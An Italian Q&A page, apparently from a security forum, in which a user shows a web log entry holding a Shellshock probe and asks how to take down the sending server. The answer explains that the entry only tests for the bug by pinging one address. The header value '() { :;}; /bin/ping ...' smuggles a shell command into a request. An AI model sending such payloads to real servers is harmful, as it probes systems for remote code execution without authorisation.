Qualcuno può chiudere "198.101.206.138" e "89.207.135.125" in basso? [chiuso]

-7
egrep "};|}\s*;" /var/www/logs/access* 
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

Come possiamo arrestare il server dietro l'IP che ha fatto questo?

    
posta somelooser28533 26.09.2014 - 12:18
fonte

1 risposta

4

La voce di registro che stai visualizzando non è un attacco. È semplicemente un sondaggio per vedere se sei vulnerabile: /bin/ping -c 1 198.101.206.138 significa "invia un singolo pacchetto echo ICMP a 198.101.206.138". Inoltre, funziona solo sui sistemi che memorizzano gli script CGI nella directory /cgi-sys/ non standard, piuttosto che sul solito /cgi-bin/ .

    
risposta data 26.09.2014 - 12:27
fonte

Leggi altre domande sui tag